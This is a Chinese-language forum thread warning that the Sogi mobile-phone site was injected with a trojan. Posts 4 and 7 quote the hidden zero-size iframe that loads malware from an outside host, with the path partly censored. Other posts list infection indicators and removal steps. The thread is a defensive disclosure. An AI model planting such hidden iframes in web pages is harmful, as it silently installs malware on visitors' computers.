【警告】Sogi! 手機王--被植入木馬

顯示結果從第 1 筆 到 10 筆,共計 10 筆
  1. #1
    會員 hcchen 的大頭照
    註冊日期
    2002-07-26
    所在地區
    HTTB 10M/2M
    討論區文章
    137

    警告 【警告】Sogi! 手機王--被植入木馬

    常到Sogi! 手機王的網友請注意。
    該網站已經被植入木馬,一進入網站將會被暗中下載及執行木馬程式。



    不要用人類有限的知識
      去否認這宇宙中無限的可能

  2. #2
    會員
    註冊日期
    2004-11-08
    所在地區
    中華電信FTTH-60M/15M
    討論區文章
    95

    回覆: 【警告】Sogi! 手機王--被植入木馬

    何時發現的??
    完了,我10月中旬有上去查資料耶!可是SCS3.1軟體沒有警告一一"
    這下怎麼找到知道有無中標和去解這木馬??

  3. #3
    EVO
    EVO 目前未上線
    會員 EVO 的大頭照
    註冊日期
    2001-09-29
    所在地區
    HiNet
    討論區文章
    237

    回覆: 【警告】Sogi! 手機王--被植入木馬

    這消息哪裡來的?
    我這陣子都有上手機王,不過卡巴也沒偵測到,全機掃描的時候也沒發現?
    所以是真的還是誤傳?
    生活往往是苦澀與甘美的混合。
    沒有甘美,將喪失追求突破的動力;
    少了苦澀,再多的收穫也毫無意義。
    真正懂得生活的人,應該親手決定混合的比例;
    這樣的人生,才值得爭取,值得擁有、值得回味!

  4. #4
    會員 hcchen 的大頭照
    註冊日期
    2002-07-26
    所在地區
    HTTB 10M/2M
    討論區文章
    137

    回覆: 【警告】Sogi! 手機王--被植入木馬

    引用 作者:EVO
    這消息哪裡來的?
    我這陣子都有上手機王,不過卡巴也沒偵測到,全機掃描的時候也沒發現?
    所以是真的還是誤傳?
    前幾天有不正常反應,今天開著FlashGet去試就攔截到了.......

    開起手機王的網站後觀看原始碼,將原始碼拉到最下方:
    找到以下的原始碼,就是連到木馬網站
    [PHP]
    <iframe src=http://www.lifeline.org.tw/image/***.***(消音) width=0 height=0></iframe>
    [/PHP]
    不過剛剛再去測試,上述網址已經沒有反應了.......

    不要用人類有限的知識
      去否認這宇宙中無限的可能

  5. #5
    會員 hcchen 的大頭照
    註冊日期
    2002-07-26
    所在地區
    HTTB 10M/2M
    討論區文章
    137

    回覆: 【警告】Sogi! 手機王--被植入木馬

    忘記說.......^^"
    開FlashGet是利用FlashGet會接手IE下載檔案的特性來捕捉那些隱藏的下載。
    所以不是防毒程式攔截到的。
    另外也已經通知手機王了。



    不要用人類有限的知識
      去否認這宇宙中無限的可能

  6. #6
    會員
    註冊日期
    2004-11-08
    所在地區
    中華電信FTTH-60M/15M
    討論區文章
    95

    回覆: 【警告】Sogi! 手機王--被植入木馬

    木馬名稱??
    該木馬的目的??
    那怎麼知道自己中標了??
    如何解決??

    謝謝QQ

  7. #7
    會員 hcchen 的大頭照
    註冊日期
    2002-07-26
    所在地區
    HTTB 10M/2M
    討論區文章
    137

    回覆: 【警告】Sogi! 手機王--被植入木馬

    大概分析了一下:
    [PHP]
    <iframe src=http://www.lifeline.org.tw/image/***.***(消音) width=0 height=0></iframe>
    [/PHP]
    會經由該網頁下載檔案svchost.exe並執行。
    但是會出現svchost.exe並不是標準的應用程式,然後跟著下載1.exe
    svchost.exe內容:見附加檔案Sogi.jpg
    檔案大小:174 位元組
    該木馬的目的:未知
    那怎麼知道自己中標了:
    檢查C:\Documents and Settings\使用者名稱\Local Settings\Temp下是否有
    svchost.exe

    如何解決:
    將C:\Documents and Settings\使用者名稱\Local Settings\Temp
    底下的svchost.exe直接刪除


    至於1.exe恕在下無膽......~"~
    早早就在FlashGet裡面刪除了.......^^"

    PS.偵測至目前時間還是無法ping到該網站
    附加圖片 附加圖片 sogi.jpg  
    此文章於 2006-10-29 01:01 AM 被 hcchen 編輯。

    不要用人類有限的知識
      去否認這宇宙中無限的可能

  8. #8
    會員
    註冊日期
    2004-11-08
    所在地區
    中華電信FTTH-60M/15M
    討論區文章
    95

    回覆: 【警告】Sogi! 手機王--被植入木馬

    謝謝告知!
    依照大大提供的方式看來我沒中標Orz
    最討厭駭客搞這種釣魚方式=.=
    以後有機會再去裝一個Norton Confidential來預防XD

    引用 作者:hcchen
    大概分析了一下:
    ~43
    那怎麼知道自己中標了:
    檢查C:\Documents and Settings\使用者名稱\Local Settings\Temp下是否有
    svchost.exe

  9. #9
    會員 hcchen 的大頭照
    註冊日期
    2002-07-26
    所在地區
    HTTB 10M/2M
    討論區文章
    137

    回覆: 【警告】Sogi! 手機王--被植入木馬

    意外的在C:\WINDOWS\system32下發現
    msnfile.dll和msnfile.exe這2個檔案......
    產生的時間剛好在偵測手機王木馬的這段時間
    爬了一下還沒有仔細的相關資訊.......

    另外,剛剛上了手機王看了一下.......
    該框架語法已經移除了........

    不要用人類有限的知識
      去否認這宇宙中無限的可能

  10. #10
    地平線的那端 DarkSkyline 的大頭照
    註冊日期
    2001-05-09
    所在地區
    Hinet 4M/1M
    討論區文章
    554

    回覆: 【警告】Sogi! 手機王--被植入木馬

    連到 www.sogi.com.tw 會自動下載 gfile.dll 到c:\windows\system32\資料夾底下, AntiVir PersonalEdition Premium找到"HEUR/Malware"病毒,請大家測試一下自己的防毒軟體....^_^


    Dark Skyline -三分技術,七分管理-
    Ublink 客服專線:0800-555195
    Ublink -看見您對網路的需求 http://ns2.ublink.org
    網路設備的專業服務團隊 - http://www.ublink.org
    小紅傘(AVIRA AntiVir)病毒回報網址 - http://analysis.avira.com/samples/index.php

類似的主題

  1. 【求助】論壇被植入木馬病毒
    作者:eva671117 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 24
    最後發表: 2007-04-27, 10:15 PM
  2. 【警告】手機王網頁又被植入惡意連結
    作者:sai7sai 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 16
    最後發表: 2007-02-24, 10:15 PM
  3. 手機王又被植入木馬了
    作者:hcchen 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 11
    最後發表: 2006-10-29, 06:25 PM
  4. 【轉貼】Sendmail可能被植入木馬程式!
    作者:nyker 所在討論版:-- 網 路 技 術 版
    回覆: 0
    最後發表: 2002-11-02, 07:27 PM
  5. 這是被植入木馬嗎?
    作者:chiener 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 0
    最後發表: 2002-04-23, 04:23 PM

 

此網頁沒有從搜尋引擎而來的訪客

發表文章規則

  • 不可以發表新主題
  • 不可以回覆文章
  • 不可以上傳附加檔案
  • 不可以編輯自己的文章
  •